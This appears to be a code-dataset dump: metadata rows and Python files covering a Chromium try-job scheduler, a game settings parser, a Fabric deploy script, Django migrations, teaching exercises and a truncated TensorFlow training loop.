| 34.144578 | 113 | 0.673606 | 388 | 2,834 | 4.822165 | 0.407216 | 0.016034 | 0.029931 | 0.032068 | 0.35489 | 0.35489 | 0.35489 | 0.35489 | 0.35489 | 0.35489 | 0 | 0.015639 | 0.210303 | 2,834 | 82 | 114 | 34.560976 | 0.820375 | 0.402258 | 0 | 0.190476 | 0 | 0 | 0.068027 | 0.022263 | 0 | 0 | 0 | 0.012195 | 0.095238 | 1 | 0.142857 | false | 0 | 0.095238 | 0 | 0.428571 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a77403338ee31e5e87171f17d753b2434e4a1a1 | 7,341 | py | Python | appengine/findit/waterfall/try_job_util.py | eunchong/infra | ce3728559112bfb3e8b32137eada517aec6d22f9 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/waterfall/try_job_util.py | eunchong/infra | ce3728559112bfb3e8b32137eada517aec6d22f9 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/waterfall/try_job_util.py | eunchong/infra | ce3728559112bfb3e8b32137eada517aec6d22f9 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from google.appengine.ext import ndb
from common import appengine_util
from common import constants
from model import analysis_status
from model.wf_try_job import WfTryJob
from waterfall import swarming_tasks_to_try_job_pipeline
from waterfall import waterfall_config
from waterfall.try_job_type import TryJobType
def _CheckFailureForTryJobKey(
master_name, builder_name, build_number,
failure_result_map, failed_step_or_test, failure):
"""Compares the current_failure and first_failure for each failed_step/test.
If equal, a new try_job needs to start;
If not, apply the key of the first_failure's try_job to this failure.
"""
# TODO(chanli): Need to compare failures across builders
# after the grouping of failures is implemented.
# TODO(chanli): Need to handle cases where first failure is actually
# more than 20 builds back. The implementation should not be here,
# but need to be taken care of.
if not failure.get('last_pass'):
# Bail out since cannot figure out the good_revision.
return False, None
if failure['current_failure'] == failure['first_failure']:
failure_result_map[failed_step_or_test] = '%s/%s/%s' % (
master_name, builder_name, build_number)
return True, failure['last_pass'] # A new try_job is needed.
else:
failure_result_map[failed_step_or_test] = '%s/%s/%s' % (
master_name, builder_name, failure['first_failure'])
return False, None
def _CheckIfNeedNewTryJobForTestFailure(
failure_level, master_name, builder_name, build_number,
failure_result_map, failures):
"""Traverses failed steps or tests to check if a new try job is needed."""
need_new_try_job = False
last_pass = build_number
targeted_tests = {} if failure_level == 'step' else []
for failure_name, failure in failures.iteritems():
if 'tests' in failure:
failure_result_map[failure_name] = {}
failure_targeted_tests, failure_need_try_job, failure_last_pass = (
_CheckIfNeedNewTryJobForTestFailure(
'test', master_name, builder_name, build_number,
failure_result_map[failure_name], failure['tests']))
if failure_need_try_job:
targeted_tests[failure_name] = failure_targeted_tests
else:
failure_need_try_job, failure_last_pass = _CheckFailureForTryJobKey(
master_name, builder_name, build_number,
failure_result_map, failure_name, failure)
if failure_need_try_job:
if failure_level == 'step':
targeted_tests[failure_name] = []
else:
targeted_tests.append(failure_name)
need_new_try_job = need_new_try_job or failure_need_try_job
last_pass = (failure_last_pass if failure_last_pass and
failure_last_pass < last_pass else last_pass)
return targeted_tests, need_new_try_job, last_pass
@ndb.transactional
def _NeedANewTryJob(
master_name, builder_name, build_number, failed_steps, failure_result_map):
"""Checks if a new try_job is needed."""
need_new_try_job = False
last_pass = build_number
if 'compile' in failed_steps:
try_job_type = TryJobType.COMPILE
targeted_tests = None
need_new_try_job, last_pass = _CheckFailureForTryJobKey(
master_name, builder_name, build_number,
failure_result_map, TryJobType.COMPILE, failed_steps['compile'])
else:
try_job_type = TryJobType.TEST
targeted_tests, need_new_try_job, last_pass = (
_CheckIfNeedNewTryJobForTestFailure(
'step', master_name, builder_name, build_number, failure_result_map,
failed_steps))
if need_new_try_job:
try_job = WfTryJob.Get(
master_name, builder_name, build_number)
if try_job:
if try_job.failed:
try_job.status = analysis_status.PENDING
try_job.put()
else:
need_new_try_job = False
else:
try_job = WfTryJob.Create(
master_name, builder_name, build_number)
try_job.put()
return need_new_try_job, last_pass, try_job_type, targeted_tests
def _GetFailedTargetsFromSignals(signals, master_name, builder_name):
compile_targets = []
if not signals or 'compile' not in signals:
return compile_targets
strict_regex = waterfall_config.EnableStrictRegexForCompileLinkFailures(
master_name, builder_name)
for source_target in signals['compile'].get('failed_targets', []):
# For link failures, we pass the executable targets directly to try-job, and
# there is no 'source' for link failures.
# For compile failures, only pass the object files as the compile targets
# for the bots that we use strict regex to extract such information.
if not source_target.get('source') or strict_regex:
compile_targets.append(source_target.get('target'))
return compile_targets
def ScheduleTryJobIfNeeded(failure_info, signals=None, build_completed=False):
# Do not schedule try-jobs or Swarming tasks until the build is completed.
if not build_completed:
return {}
master_name = failure_info['master_name']
builder_name = failure_info['builder_name']
build_number = failure_info['build_number']
failed_steps = failure_info.get('failed_steps', [])
builds = failure_info.get('builds', {})
tryserver_mastername, tryserver_buildername = (
waterfall_config.GetTrybotForWaterfallBuilder(master_name, builder_name))
if not tryserver_mastername or not tryserver_buildername:
logging.info('%s, %s is not supported yet.', master_name, builder_name)
return {}
failure_result_map = {}
need_new_try_job, last_pass, try_job_type, targeted_tests = (
_NeedANewTryJob(master_name, builder_name, build_number,
failed_steps, failure_result_map))
if need_new_try_job:
compile_targets = (_GetFailedTargetsFromSignals(
signals, master_name, builder_name)
if try_job_type == TryJobType.COMPILE else None)
pipeline = (
swarming_tasks_to_try_job_pipeline.SwarmingTasksToTryJobPipeline(
master_name, builder_name, build_number,
builds[str(last_pass)]['chromium_revision'],
builds[str(build_number)]['chromium_revision'],
builds[str(build_number)]['blame_list'],
try_job_type, compile_targets, targeted_tests))
pipeline.target = appengine_util.GetTargetNameForModule(
constants.WATERFALL_BACKEND)
pipeline.start(queue_name=constants.WATERFALL_TRY_JOB_QUEUE)
if try_job_type == TryJobType.TEST: # pragma: no cover
logging_str = (
'Swarming task was scheduled for build %s, %s, %s: %s because of'
' %s failure. A try job may be triggered if some reliable failure'
' is detected in the task.') % (
master_name, builder_name, build_number,
pipeline.pipeline_status_path, try_job_type)
else: # pragma: no cover
logging_str = (
'Try job was scheduled for build %s, %s, %s: %s because of %s '
'failure.') % (
master_name, builder_name, build_number,
pipeline.pipeline_status_path, try_job_type)
logging.info(logging_str)
return failure_result_map
| 38.434555 | 80 | 0.721428 | 967 | 7,341 | 5.155119 | 0.196484 | 0.055366 | 0.071615 | 0.088465 | 0.410431 | 0.330592 | 0.247944 | 0.234704 | 0.221063 | 0.211434 | 0 | 0.001026 | 0.203378 | 7,341 | 190 | 81 | 38.636842 | 0.851402 | 0.156246 | 0 | 0.29927 | 0 | 0.007299 | 0.081397 | 0 | 0 | 0 | 0 | 0.005263 | 0 | 1 | 0.036496 | false | 0.10219 | 0.065693 | 0 | 0.175182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7a7e76d080d012d4a75a0317b71ab3a4be2a2138 | 269 | py | Python | src/boiga/util.py | amarshall/boiga | faef732a59b7308b0f3be0d1d1ea047a405d641d | [
"MIT"
] | 2 | 2018-10-30T13:17:23.000Z | 2018-11-19T06:39:49.000Z | src/boiga/util.py | amarshall/boiga | faef732a59b7308b0f3be0d1d1ea047a405d641d | [
"MIT"
] | 2 | 2020-03-24T16:15:45.000Z | 2020-03-31T00:02:27.000Z | src/boiga/util.py | amarshall/boiga | faef732a59b7308b0f3be0d1d1ea047a405d641d | [
"MIT"
] | null | null | null | import typing as T
_T = T.TypeVar('_T')
class _Container(T.Generic[_T]):
_value: _T
def __eq__(self, other: object) -> bool:
if isinstance(other, self.__class__):
return self._value == other._value
else:
return False
| 19.214286 | 46 | 0.594796 | 34 | 269 | 4.235294 | 0.588235 | 0.027778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.29368 | 269 | 13 | 47 | 20.692308 | 0.757895 | 0 | 0 | 0 | 0 | 0 | 0.007435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7a84f01ca428f54ff44dff96ff54b827f508dc48 | 3,179 | py | Python | src/parse_settings.py | ChillerDragon-backup/TeeworldsEconMod | d41560104f79ebbeea2b9e6227ae7e93c1a90ec2 | [
"MIT"
] | 5 | 2019-05-04T00:48:12.000Z | 2021-02-22T11:03:19.000Z | src/parse_settings.py | ChillerDragon-backup/TeeworldsEconMod | d41560104f79ebbeea2b9e6227ae7e93c1a90ec2 | [
"MIT"
] | 41 | 2019-04-04T16:04:14.000Z | 2022-01-24T20:35:20.000Z | src/parse_settings.py | ChillerDragon-backup/TeeworldsEconMod | d41560104f79ebbeea2b9e6227ae7e93c1a90ec2 | [
"MIT"
] | 1 | 2018-11-04T20:16:28.000Z | 2018-11-04T20:16:28.000Z | #!/usr/bin/env python3
"""Module for parsing tem setting files"""
from base.rcon import echo
import base.settings
class TemParseError(Exception):
"""Tem Parser Exception"""
def __init__(self, value):
Exception.__init__(self)
self.value = value
def __str__(self):
return repr(self.value)
def parse_error(err_type: str, err_msg: str):
"""Throw parser error"""
echo("[ERROR:settings] " + str(err_type) + ": " + str(err_msg))
raise TemParseError(err_type + ": " + err_msg)
def parse_bool(val: str, line_num: int) -> bool:
"""Parse boolean"""
val = val.lower()
if val in ("0", "false"):
return False
if val in ("1", "true"):
return True
parse_error("BoolError", "cannot parse bool " + str(line_num) + ":'" + str(val) + "'")
return False
def parse_list_dyn(val: str):
"""Parse dynamic list type"""
if val is None or val == "" or val == ",":
return None
return val.split(',')
def parse_list(sett: str, val: str, line_num: int):
"""Parse list type"""
raw_list = base.settings.Settings().settings_dict[sett][0]
raw_list = raw_list[1:-1]
list_vals = raw_list.split(',')
if val in list_vals:
return str(val)
parse_error("ListError", str(line_num) + ":'" + str(val) + "' not in list " + str(list_vals))
return ""
def read_settings_line(line: str, line_num: int):
"""Parse single line of tem settings file"""
split = line.find("=")
sett = line[3:split]
val = line[split+1:].strip()
settings = base.settings.Settings()
if sett not in settings.settings_dict:
parse_error(
"UnkownSetting",
"line[" + str(line_num) + "] setting[" + str(sett) + "] value[" + str(val) + "]")
# make sure file_database is a folder
if sett == "file_database":
if val[-1] != "/":
val += "/"
if settings.settings_dict[sett][0] == "str":
settings.settings_dict[sett][1] = str(val)
elif settings.settings_dict[sett][0] == "int":
settings.settings_dict[sett][1] = int(val)
elif settings.settings_dict[sett][0] == "bool":
settings.settings_dict[sett][1] = parse_bool(val, line_num)
elif settings.settings_dict[sett][0][0] == "[":
if settings.settings_dict[sett][0][1] == "]": # empty list ( no limit )
settings.settings_dict[sett][1] = parse_list_dyn(val)
else: # pre defined allowed values in list
settings.settings_dict[sett][1] = parse_list(sett, val, line_num)
else:
parse_error(
"TypeError",
"invalid type " + str(line_num) + ":'" + str(settings.settings_dict[sett][0]) + "'")
def read_settings_file(file: str):
"""Parse settings file given a filepath"""
line_num = 0
with open(file, encoding='UTF-8') as file_io:
for line in file_io:
line_num += 1
if line[0] == "#":
continue # ignore comments
if line[:3] == "sh_":
continue # ignore shell settings
if not line.strip():
continue # ignore empty lines
read_settings_line(line, line_num)
| 34.934066 | 97 | 0.587921 | 420 | 3,179 | 4.27381 | 0.240476 | 0.133705 | 0.144847 | 0.160446 | 0.261838 | 0.13649 | 0.073538 | 0 | 0 | 0 | 0 | 0.01146 | 0.258886 | 3,179 | 90 | 98 | 35.322222 | 0.750424 | 0.119534 | 0 | 0.128571 | 0 | 0 | 0.068677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.028571 | 0.014286 | 0.271429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a8afbf7a5a5a3530cfe29a371a839efa2a02e4a | 491 | py | Python | Exemples cours 5/pointOBJ.py | geocot/coursPython | 74f634a96146c2244f859b9d449534330d9542fb | [
"Apache-2.0"
] | null | null | null | Exemples cours 5/pointOBJ.py | geocot/coursPython | 74f634a96146c2244f859b9d449534330d9542fb | [
"Apache-2.0"
] | null | null | null | Exemples cours 5/pointOBJ.py | geocot/coursPython | 74f634a96146c2244f859b9d449534330d9542fb | [
"Apache-2.0"
] | null | null | null | class Point:
"Classe Point géographique contenant une position"
def __init__(self,x,y):
self._x=x
self._y=y
def getx(self):
return self._x
def gety(self):
return self._y
def setx(self, x):
self._x = x
def sety(self, y):
self._y = y
def translation(self,valeur):
self._x +=valeur
self._y +=valeur
p1 = Point(-73,45)
p1.translation(2)
print(p1.getx())
print(p1.gety())
| 19.64 | 55 | 0.535642 | 68 | 491 | 3.691176 | 0.352941 | 0.119522 | 0.047809 | 0.071713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027864 | 0.342159 | 491 | 24 | 56 | 20.458333 | 0.749226 | 0.09776 | 0 | 0.2 | 0 | 0 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0.1 | 0.45 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a8b9bc8c83018223580b28db60854c71ccc69e4 | 1,826 | py | Python | fabfile.py | zzz123-tech/zhanzhenblog | 0faafe4f1977b4d42bc9c5b992ab7f42bf3bfe0d | [
"MIT"
] | null | null | null | fabfile.py | zzz123-tech/zhanzhenblog | 0faafe4f1977b4d42bc9c5b992ab7f42bf3bfe0d | [
"MIT"
] | 5 | 2021-04-08T19:40:57.000Z | 2021-09-22T19:40:18.000Z | fabfile.py | zzz123-tech/zhanzhenblog | 0faafe4f1977b4d42bc9c5b992ab7f42bf3bfe0d | [
"MIT"
] | null | null | null | from fabric import task
from invoke import Responder
from _credentials import github_username, github_password
def _get_github_auth_responders():
"""
返回 GitHub 用户名密码自动填充器
"""
username_responder = Responder(
pattern="Username for 'https://github.com':",
response='{}\n'.format(github_username)
)
password_responder = Responder(
pattern="Password for 'https://{}@github.com':".format(github_username),
response='{}\n'.format(github_password)
)
return [username_responder, password_responder]
@task()
def deploy(c):
supervisor_conf_path = '~/etc/'
supervisor_program_name = 'zhanzhenblog'
project_root_path = '~/apps/zhanzhenblog/'
# 先停止应用
with c.cd(supervisor_conf_path):
cmd = '/home/zhanzhen/.local/bin/supervisorctl stop {}'.format(supervisor_program_name)
c.run(cmd)
# 进入项目根目录,从 Git 拉取最新代码
with c.cd(project_root_path):
cmd = 'git pull'
responders = _get_github_auth_responders()
c.run(cmd, watchers=responders)
# 安装依赖,迁移数据库,收集静态文件
with c.cd(project_root_path):
c.run('pipenv install --deploy --ignore-pipfile')
c.run('pipenv run python manage.py migrate')
c.run('pipenv run python manage.py collectstatic --noinput')
# 重新启动应用
with c.cd(supervisor_conf_path):
cmd = '/home/zhanzhen/.local/bin/supervisorctl start {}'.format(supervisor_program_name)
c.run(cmd)
| 38.041667 | 120 | 0.535597 | 174 | 1,826 | 5.413793 | 0.390805 | 0.025478 | 0.029724 | 0.048832 | 0.305732 | 0.305732 | 0.259023 | 0.129512 | 0.129512 | 0.129512 | 0 | 0 | 0.366375 | 1,826 | 47 | 121 | 38.851064 | 0.814175 | 0.039978 | 0 | 0.1875 | 0 | 0 | 0.20058 | 0.045217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.15625 | 0.09375 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7a8cb2e77bc04acf83fe78c12ebe944bd64c7b64 | 396 | py | Python | user/migrations/0009_user_website.py | kthaisse/website | be0d0e0763ae2a6b8351c08b432229eae9521f1d | [
"MIT"
] | 1 | 2020-03-19T09:44:16.000Z | 2020-03-19T09:44:16.000Z | user/migrations/0009_user_website.py | kthaisse/website | be0d0e0763ae2a6b8351c08b432229eae9521f1d | [
"MIT"
] | 43 | 2020-02-22T09:32:27.000Z | 2022-03-22T11:24:51.000Z | user/migrations/0009_user_website.py | kthaisse/website | be0d0e0763ae2a6b8351c08b432229eae9521f1d | [
"MIT"
] | 3 | 2020-03-06T13:27:12.000Z | 2022-02-07T09:01:07.000Z | # Generated by Django 2.2.10 on 2020-04-04 17:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("user", "0008_user_picture_restrictions")]
operations = [
migrations.AddField(
model_name="user",
name="website",
field=models.CharField(blank=True, max_length=255, null=True),
)
]
| 23.294118 | 74 | 0.633838 | 46 | 396 | 5.347826 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077441 | 0.25 | 396 | 16 | 75 | 24.75 | 0.750842 | 0.116162 | 0 | 0 | 1 | 0 | 0.12931 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a9163686720b28ba98796c68d0cd6e016ed9e64 | 1,637 | py | Python | binary_for_search.py | jorgeMorfinezM/binary_search_algorithms | 75a4f6febe6ffddbaa09aa10c87ba76027cd7af3 | [
"Apache-2.0"
] | null | null | null | binary_for_search.py | jorgeMorfinezM/binary_search_algorithms | 75a4f6febe6ffddbaa09aa10c87ba76027cd7af3 | [
"Apache-2.0"
] | null | null | null | binary_for_search.py | jorgeMorfinezM/binary_search_algorithms | 75a4f6febe6ffddbaa09aa10c87ba76027cd7af3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Algoritmo de busqueda binaria usando el ciclo while
escrito en Python.
Este metodo funciona con cadenas y numeros por igual, ya
que el lenguaje trata a las cadenas lexicograficamente;
comparando sus valores en el codigo ASCII
"""
def binary_search(list_data, search_data):
left_index, right_index = 0, len(list_data) - 1
while left_index <= right_index:
pivot_index = (left_index + right_index) // 2
pivot_data = list_data[pivot_index]
if pivot_data == search_data:
return pivot_index
if search_data < pivot_data:
right_index = pivot_index - 1
else:
left_index = pivot_index + 1
# sale del ciclo, significa que no existe el valor buscado en el arreglo
return -1
"""
Tests
"""
# Test con arreglo numericos
data_list = [1, 2, 3, 10, 50, 80, 120, 150, 500, 1000]
print("Busqueda para la lista: ", data_list)
data_search = 500
index_search = binary_search(data_list, data_search)
print("El elemento {} esta en el indice {}".format(data_search, index_search))
# Test con arreglo de cadenas
data_list = ["Albino", "Bambu", "Becerro", "Contaminacion", "Cortina", "Trampolin"]
print("Busqueda para la lista: ", data_list)
data_search = "Cortina"
index_search = binary_search(data_list, data_search)
print("El elemento {} esta en el indice {}".format(data_search, index_search))
data_chars = ["{", "[", "]", "}", "]"]
print("Busqueda para la lista: ", data_chars)
data_search = '['
search = binary_search(data_chars, data_search)
print("El elemento {} esta en el indice {}".format(data_search, search)) | 25.184615 | 83 | 0.6854 | 231 | 1,637 | 4.649351 | 0.367965 | 0.102421 | 0.065177 | 0.067039 | 0.336127 | 0.336127 | 0.310056 | 0.310056 | 0.310056 | 0.231844 | 0 | 0.024409 | 0.199145 | 1,637 | 65 | 84 | 25.184615 | 0.794813 | 0.229078 | 0 | 0.222222 | 0 | 0 | 0.191283 | 0 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a916a9d126a25799ce3473d1cbc7c356c7ec1da | 353 | py | Python | ressources/migrations/0005_auto_20200804_2357.py | rollanda21/Genetic-algorithm-for-time-table-generation | fb1ab13ab54da1a5d0582787baa2c444a9a838db | [
"MIT"
] | null | null | null | ressources/migrations/0005_auto_20200804_2357.py | rollanda21/Genetic-algorithm-for-time-table-generation | fb1ab13ab54da1a5d0582787baa2c444a9a838db | [
"MIT"
] | null | null | null | ressources/migrations/0005_auto_20200804_2357.py | rollanda21/Genetic-algorithm-for-time-table-generation | fb1ab13ab54da1a5d0582787baa2c444a9a838db | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-08-04 22:57
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ressources', '0004_auto_20200731_1630'),
]
operations = [
migrations.AlterModelOptions(
name='meetingtime',
options={'ordering': ('day',)},
),
]
| 19.611111 | 50 | 0.594901 | 35 | 353 | 5.914286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121569 | 0.27762 | 353 | 17 | 51 | 20.764706 | 0.690196 | 0.127479 | 0 | 0 | 1 | 0 | 0.179739 | 0.075163 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a9c270af83981606714f4300077542e6e870eab | 378 | py | Python | archive/migrations/0007_auto_20190715_0559.py | emawind84/rrwebtv | ae22cd39ea430aed0de2b852e40c309465a7237b | [
"MIT"
] | null | null | null | archive/migrations/0007_auto_20190715_0559.py | emawind84/rrwebtv | ae22cd39ea430aed0de2b852e40c309465a7237b | [
"MIT"
] | 2 | 2020-06-05T20:13:36.000Z | 2021-06-10T21:18:43.000Z | archive/migrations/0007_auto_20190715_0559.py | emawind84/rrwebtv | ae22cd39ea430aed0de2b852e40c309465a7237b | [
"MIT"
] | null | null | null | # Generated by Django 2.0.13 on 2019-07-15 05:59
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('archive', '0006_performance_featured'),
]
operations = [
migrations.RenameField(
model_name='performance',
old_name='pilot_nickname',
new_name='pilot',
),
]
| 19.894737 | 49 | 0.600529 | 39 | 378 | 5.666667 | 0.794872 | 0.081448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074627 | 0.291005 | 378 | 18 | 50 | 21 | 0.75 | 0.121693 | 0 | 0 | 1 | 0 | 0.187879 | 0.075758 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aa00615c0b94b6e49a52a8d141fa1c7aa174f50 | 2,089 | py | Python | Week1/main.py | EricCharnesky/CIS2001-Winter2022 | 9c74433ade96e4c7bf9029543285f1ded1fe91e5 | [
"MIT"
] | 3 | 2022-01-20T21:55:17.000Z | 2022-02-02T23:10:45.000Z | Week1/main.py | EricCharnesky/CIS2001-Winter2022 | 9c74433ade96e4c7bf9029543285f1ded1fe91e5 | [
"MIT"
] | null | null | null | Week1/main.py | EricCharnesky/CIS2001-Winter2022 | 9c74433ade96e4c7bf9029543285f1ded1fe91e5 | [
"MIT"
] | 2 | 2022-02-06T02:59:32.000Z | 2022-02-23T02:34:13.000Z | import random
value_a = int(input("enter the first number"))
value_b = int(input("enter the second number"))
value_c = int(input("enter the third number"))
print(value_b + value_a + value_c)
list_of_numbers = []
for number in range(100):
list_of_numbers.append(random.randint(1,100)) # inclusive of both values
minimum_value = list_of_numbers[0]
maximum_value = list_of_numbers[0]
total = list_of_numbers[0]
for index in range(1, len(list_of_numbers)):
if list_of_numbers[index] < minimum_value:
minimum_value = list_of_numbers[index]
if list_of_numbers[index] > maximum_value:
maximum_value = list_of_numbers[index]
total += list_of_numbers[index]
for number in list_of_numbers:
if number< minimum_value:
minimum_value = list_of_numbers[index]
if number > maximum_value:
maximum_value = list_of_numbers[index]
total += number
average = total / len(list_of_numbers)
print("Min value:", minimum_value)
print("Max value:", maximum_value)
print("average:", average)
# book
# number formatting from https://www.bing.com/search?q=python+string+format+number+decimal+places&cvid=c321953d925a4c3f99ca309d2a4eff65&aqs=edge.0.0j69i57.8149j0j1&pglt=43&FORM=ANNTA1&PC=W000
print("Min: {:d} - max: {:d} - average: {:.2f}".format(
min(list_of_numbers), max(list_of_numbers), sum(list_of_numbers) / len(list_of_numbers)))
print("Min:", min(list_of_numbers), "- max:", max(list_of_numbers), "- average: ",
sum(list_of_numbers) / len(list_of_numbers))
gradebook = {}
gradebook['Eric'] = 'A' # keys have to be unique
gradebook['Jeb'] = 'A' # will add new value if the key doesn't exist
gradebook['Eric'] = 'B' # changes the value
name = input("Enter the name of someone to get their grade")
if name in gradebook:
print(gradebook[name])
else:
print("they are not in the gradebook, let's add them, what is their grade?")
grade = input()
gradebook[name.lower()] = grade
for key in list(gradebook.keys()):
grade = gradebook[key]
gradebook.pop(key)
gradebook[key.lower()] = grade
print(gradebook)
| 31.651515 | 191 | 0.713739 | 316 | 2,089 | 4.515823 | 0.313291 | 0.096706 | 0.20953 | 0.088297 | 0.284513 | 0.194814 | 0.17239 | 0.17239 | 0.12754 | 0 | 0 | 0.028377 | 0.156534 | 2,089 | 65 | 192 | 32.138462 | 0.781498 | 0.145524 | 0 | 0.085106 | 0 | 0 | 0.15748 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.021277 | 0.191489 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aa7b397c8a186c0ba8a769562764b679d11f2b9 | 3,613 | py | Python | train.py | Unique-Divine/Neural-Networks-for-Gravitational-Lens-Modeling | cd64ceda84bdd1486ad17585074ba8c7a0576ab5 | [
"MIT"
] | null | null | null | train.py | Unique-Divine/Neural-Networks-for-Gravitational-Lens-Modeling | cd64ceda84bdd1486ad17585074ba8c7a0576ab5 | [
"MIT"
] | null | null | null | train.py | Unique-Divine/Neural-Networks-for-Gravitational-Lens-Modeling | cd64ceda84bdd1486ad17585074ba8c7a0576ab5 | [
"MIT"
] | null | null | null | ############### OPTIMIZER:
learning_rate = 1e-6
train_step = tf.train.AdamOptimizer(learning_rate).minimize(
MeanSquareCost, var_list=train_pars)
##########################
num_batch_samples = 50
num_iterations = 1
min_eval_cost = 0.06
X = np.zeros((cycle_batch_size, numpix_side*numpix_side), dtype='float32')
Y = np.zeros((cycle_batch_size, num_out), dtype='float32')
MAG = np.zeros((cycle_batch_size, 1), dtype='float32')
min_unmasked_flux = 0.98
X_test = np.zeros((num_test_samples, numpix_side*numpix_side), dtype='float32')
Y_test = np.zeros((num_test_samples, num_out), dtype='float32')
MAG_test = np.zeros((num_test_samples, 1), dtype='float32')
max_noise_rms = max_testnoise_rms
read_data_batch(X_test, Y_test, MAG_test, max_num_test_samples, 'test')
sess = tf.Session()
sess.run(tf.global_variables_initializer())
if RESTORE:
restorer.restore(sess, restore_file)
n = 0
ind_t = range(num_test_samples)
train_cost = 0
write_time = time.time()
start_time = time.time()
for i_sample in range(1000000):
if i_sample%1 == 0:
max_noise_rms = max_trainoise_rms
min_unmasked_flux = 0.75
read_data_batch(X, Y, MAG, num_training_samples, 'train')
for i in range(num_iterations):
n = n + 1
if cycle_batch_size == num_batch_samples:
ind = range(num_batch_samples)
else:
ind = np.random.randint(
0, high=cycle_batch_size, size=num_batch_samples)
xA = X[ind]
yA = Y[ind]
